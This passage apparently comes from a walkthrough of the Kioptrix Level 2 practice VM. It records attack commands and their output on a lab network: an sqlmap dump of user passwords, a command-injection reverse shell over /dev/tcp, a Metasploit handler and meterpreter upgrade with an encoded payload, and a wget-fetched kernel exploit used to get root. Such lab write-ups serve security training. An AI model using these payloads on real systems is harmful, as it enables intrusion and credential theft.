| 1  | 5afac8d85f | admin    |
| 2  | 66lajGGbla | john     |
+----+------------+----------+

[22:18:07] [INFO] table 'webapp.users' dumped to CSV file '/root/.sqlmap/output/192.168.88.130/dump/webapp/users.csv'
[22:18:07] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.88.130'

[*] ending @ 22:18:07 /2020-01-02/
</code></pre><pre><code class=language-bash>sqlmap -r request.txt --os-shell
</code></pre><pre><code class=language-bash>
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.3.12#stable}
|_ -| . [&quot;]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal
laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 22:20:04 /2020-01-02/

[22:20:04] [INFO] parsing HTTP request from 'request.txt'
[22:20:04] [INFO] resuming back-end DBMS 'mysql'
[22:20:04] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: psw (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: uname=admin&amp;psw=-3012' OR 8578=8578-- aTyJ&amp;btnLogin=Login

    Type: time-based blind
    Title: MySQL &lt; 5.0.12 AND time-based blind (heavy query)
    Payload: uname=admin&amp;psw=admin' AND 5240=BENCHMARK(5000000,MD5(0x63415659))-- YhHX&amp;btnLogin=Login
---
[22:20:04] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL &lt; 5.0.12
[22:20:04] [INFO] going to use a web backdoor for command prompt
[22:20:04] [INFO] fingerprinting the back-end DBMS operating system
[22:20:04] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
&gt; 4
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] y
[22:20:10] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs') (defau
lt)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
4
[22:20:20] [INFO] using generated directory list: /var/www,/var/www/html,/var/www/htdocs,/var/www/httpdocs,/var/www/php,/var/www/public,/var/www/src,/var/www/site,/var/www/build,/var/ww
w/web,/var/www/data,/var/www/sites/all,/var/www/www/build,/usr/local/apache,/usr/local/apache/html,/usr/local/apache/htdocs,/usr/local/apache/httpdocs,/usr/local/apache/php,/usr/local/a
pache/public,/usr/local/apache/src,/usr/local/apache/site,/usr/local/apache/build,/usr/local/apache/web,/usr/local/apache/www,/usr/local/apache/data,/usr/local/apache/sites/all,/usr/loc
al/apache/www/build,/usr/local/apache2,/usr/local/apache2/html,/usr/local/apache2/htdocs,/usr/local/apache2/httpdocs,/usr/local/apache2/php,/usr/local/apache2/public,/usr/local/apache2/
src,/usr/local/apache2/site,/usr/local/apache2/build,/usr/local/apache2/web,/usr/local/apache2/www,/usr/local/apache2/data,/usr/local/apache2/sites/all,/usr/local/apache2/www/build,/usr
/local/www/apache22,/usr/local/www/apache22/html,/usr/local/www/apache22/htdocs,/usr/local/www/apache22/httpdocs,/usr/local/www/apache22/php,/usr/local/www/apache22/public,/usr/local/ww
w/apache22/src,/usr/local/www/apache22/site,/usr/local/www/apache22/build,/usr/local/www/apache22/web,/usr/local/www/apache22/www,/usr/local/www/apache22/data,/usr/local/www/apache22/si
tes/all,/usr/local/www/apache22/www/build,/usr/local/www/apache24,/usr/local/www/apache24/html,/usr/local/www/apache24/htdocs,/usr/local/www/apache24/httpdocs,/usr/local/www/apache24/ph
p,/usr/local/www/apache24/public,/usr/local/www/apache24/src,/usr/local/www/apache24/site,/usr/local/www/apache24/build,/usr/local/www/apache24/web,/usr/local/www/apache24/www,/usr/loca
l/www/apache24/data,/usr/local/www/apache24/sites/all,/usr/local/www/apache24/www/build,/usr/local/httpd,/usr/local/httpd/html,/usr/local/httpd/htdocs,/usr/local/httpd/httpdocs,/usr/loc
al/httpd/php,/usr/local/httpd/public,/usr/local/httpd/src,/usr/local/httpd/site,/usr/local/httpd/build,/usr/local/httpd/web,/usr/local/httpd/www,/usr/local/httpd/data,/usr/local/httpd/s
ites/all,/usr/local/httpd/www/build,/var/www/nginx-default,/var/www/nginx-default/html,/var/www/nginx-default/htdocs,/var/www/nginx-default/httpdocs,/var/www/nginx-default/php,/var/www/
nginx-default/public,/var/www/nginx-default/src,/var/www/nginx-default/site,/var/www/nginx-default/build,/var/www/nginx-default/web,/var/www/nginx-default/www,/var/www/nginx-default/dat
a,/var/www/nginx-default/sites/all,/var/www/nginx-default/www/build,/srv/www,/srv/www/html,/srv/www/htdocs,/srv/www/httpdocs,/srv/www/php,/srv/www/public,/srv/www/src,/srv/www/site,/srv
/www/build,/srv/www/web,/srv/www/data,/srv/www/sites/all,/srv/www/www/build

....

[22:20:28] [WARNING] unable to upload the file stager on '/'
[22:20:28] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 562 times
</code></pre><h6 id=command-injection-in-pingitphp>Command Injection in pingit.php</h6><p>####### ls</p><pre><code class=language-bash>request:
POST /pingit.php HTTP/1.1
Host: 192.168.88.130
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.88.130/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Connection: close
Upgrade-Insecure-Requests: 1

ip=8.8.8.8%3B+ls&amp;submit=submit


Response:
HTTP/1.1 200 OK
Date: Thu, 02 Jan 2020 19:14:28 GMT
Server: Apache/2.0.52 (CentOS)
X-Powered-By: PHP/4.3.9
Content-Length: 407
Connection: close
Content-Type: text/html; charset=UTF-8

8.8.8.8; ls&lt;pre&gt;PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
64 bytes from 8.8.8.8: icmp_seq=0 ttl=128 time=4.95 ms
64 bytes from 8.8.8.8: icmp_seq=1 ttl=128 time=5.41 ms
64 bytes from 8.8.8.8: icmp_seq=2 ttl=128 time=4.45 ms

--- 8.8.8.8 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2002ms
rtt min/avg/max/mdev = 4.458/4.940/5.412/0.397 ms, pipe 2
index.php
pingit.php
&lt;/pre&gt;
</code></pre><h6 id=reverse-shell>reverse shell</h6><pre><code class=language-bash>POST /pingit.php HTTP/1.1
Host: 192.168.88.130
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.88.130/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 75
Connection: close
Upgrade-Insecure-Requests: 1

ip=8.8.8.8%3bbash+-i+&gt;%26+/dev/tcp/192.168.88.128/4444+0&gt;%261&amp;submit=submit


nc -lvp 4444
listening on [any] 4444 ...
192.168.88.130: inverse host lookup failed: Unknown host
connect to [192.168.88.128] from (UNKNOWN) [192.168.88.130] 35518
bash: no job control in this shell
bash-3.00$ whoami
apache
bash-3.00$ hostname
kioptrix.level2
bash-3.00$
</code></pre><h6 id=meterpreter>meterpreter</h6><pre><code class=language-bash>msf5 &gt; use exploit/multi/handler
msf5 exploit(multi/handler) &gt; set LHOST 192.168.88.128
LHOST =&gt; 192.168.88.128
msf5 exploit(multi/handler) &gt; set LPORT 4444
LPORT =&gt; 4444
msf5 exploit(multi/handler) &gt; set PAYLOAD linux/x86/shell/reverse_tcp
PAYLOAD =&gt; linux/x86/shell/reverse_tcp
msf5 exploit(multi/handler) &gt; run

[*] Started reverse TCP handler on 192.168.88.128:4444
[*] Sending stage (36 bytes) to 192.168.88.130
[*] Command shell session 1 opened (192.168.88.128:4444 -&gt; 192.168.88.130:32801) at 2020-01-02 23:45:52 +0100

whoami
bash: jYj?XIyjXRh//shh/binRSwhoami: No such file or directory
bash-3.00$ ^Z
Background session 1? [y/N]  y
msf5 exploit(multi/handler) &gt; use post/multi/manage/shell_to_meterpreter
msf5 post(multi/manage/shell_to_meterpreter) &gt; set session 1
session =&gt; 1
msf5 post(multi/manage/shell_to_meterpreter) &gt; run

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.88.128:4433
[*] Sending stage (985320 bytes) to 192.168.88.130
[*] Meterpreter session 2 opened (192.168.88.128:4433 -&gt; 192.168.88.130:32802) at 2020-01-02 23:47:24 +0100
[-] Error: Unable to execute the following command: &quot;echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjPAAAASgEAAAcAAAAAEAAAagpeMdv341NDU2oCsGaJ4c2Al1towKhYgGgCABFRieFqZlhQUVeJ4UPNgIXAeRlOdD1oogAAAFhqAGoFieMxyc2AhcB5vesnsge5ABAAAInjwesMweMMsH3NgIXAeBBbieGZsmqwA82AhcB4Av/huAEAAAC7AQAAAM2A&gt;&gt;'/tmp/jZqLq.b64' ; ((which base64 &gt;&amp;2 &amp;&amp; base64 -d -) || (which base64 &gt;&amp;2 &amp;&amp; base64 --decode -) || (which openssl &gt;&amp;2 &amp;&amp; openssl enc -d -A -base64 -in /dev/stdin) || (which python &gt;&amp;2 &amp;&amp; python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl &gt;&amp;2 &amp;&amp; perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2&gt; /dev/null &gt; '/tmp/PQQrZ' &lt; '/tmp/jZqLq.b64' ; chmod +x '/tmp/PQQrZ' ; '/tmp/PQQrZ' &amp; sleep 2 ; rm -f '/tmp/PQQrZ' ; rm -f '/tmp/jZqLq.b64'&quot;
[-] Output: &quot;[1] 4299&quot;
[*] Post module execution completed
</code></pre><p>sadly not working</p><h6 id=privesc---sock_sendpage-local-privilege-escalation>PrivEsc - &lsquo;sock_sendpage()&rsquo; Local Privilege Escalation</h6><p>local</p><pre><code class=language-bash>searchsploit -m exploits/linux/local/9545.c
  Exploit: Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/9545
     Path: /usr/share/exploitdb/exploits/linux/local/9545.c
File Type: C source, ASCII text, with CRLF line terminators

Copied to: /root/kioptrix/shell/9545.c


python3 -m http.server 1234

</code></pre><p>remote</p><pre><code class=language-bash>bash-3.00$ wget http://192.168.88.128:1234/9545.c
--16:14:53--  http://192.168.88.128:1234/9545.c
           =&gt; `9545.c'
Connecting to 192.168.88.128:1234... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9,783 (9.6K) [text/plain]

    0K .........                                             100%  621.99 MB/s

16:14:53 (621.99 MB/s) - `9545.c' saved [9783/9783]

bash-3.00$ gcc -o page 9545.c
9545.c:376:28: warning: no newline at end of file
bash-3.00$ ls
9545.c
page
bash-3.00$ chmod +x page
bash-3.00$ ./page
sh: no job control in this shell
sh-3.00# whoami
root
</code></pre><h4 id=19216888130-631>192.168.88.130 631</h4><pre><code class=language-bash>nc 192.168.88.130 631
GET /

HTTP/0.9 403 Forbidden
Date: Thu, 02 Jan 2020 18:14:04 GMT
Server: CUPS/1.1
Content-Language: en_US
Upgrade: TLS/1.0,HTTP/1.1
Connection: close
Content-Type: text/html
Content-Length: 150

&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;403 Forbidden&lt;/TITLE&gt;&lt;/HEAD&gt;&lt;BODY&gt;&lt;H1&gt;Forbidden&lt;/H1&gt;You don't have permission to access the resource on this server.&lt;/BODY&gt;&lt;/HTML&gt;
</code></pre><h5 id=nikto-1>Nikto</h5><pre><code class=language-bash>nikto -h 192.168.88.130:631
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.88.130
+ Target Hostname:    192.168.88.130
+ Target Port:        631
+ Start Time:         2020-01-02 21:26:25 (GMT1)
---------------------------------------------------------------------------
+ Server: CUPS/1.1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ All CGI directories 'found', use '-C none' to test none
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, POST, PUT
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ 26548 requests: 1 error(s) and 5 item(s) reported on remote host
+ End Time:           2020-01-02 21:27:36 (GMT1) (71 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
</code></pre><h4 id=19216888130-3306>192.168.88.130 3306</h4><pre><code class=language-bash>nc 192.168.88.130 3306
GjHost '192.168.88.128' is not allowed to connect to this MySQL serverr
</code></pre><footer class=footline>
</footer></div></div><div id=navigation>
</div></section><div style=left:-1000px;overflow:scroll;position:absolute;top:-1000px;border:none;box-sizing:content-box;height:200px;margin:0;padding:0;width:200px>
<div style=border:none;box-sizing:content-box;height:200px;margin:0;padding:0;width:200px></div></div><script src=/js/clipboard.min.js></script>
<script src=/js/perfect-scrollbar.min.js></script>
<script src=/js/perfect-scrollbar.jquery.min.js></script>
<script src=/js/jquery.sticky.js></script>
<script src=/js/featherlight.min.js></script>
<script src=/js/highlight.pack.js></script>
<script>hljs.initHighlightingOnLoad()</script>
<script src=/js/modernizr.custom-3.6.0.js></script>
<script src=/js/learn.js></script>
<script src=/js/hugo-learn.js></script>
<link href=/mermaid/mermaid.css rel=stylesheet>
<script src=/mermaid/mermaid.js></script>
<script>mermaid.initialize({startOnLoad:!0})</script>
</body></html>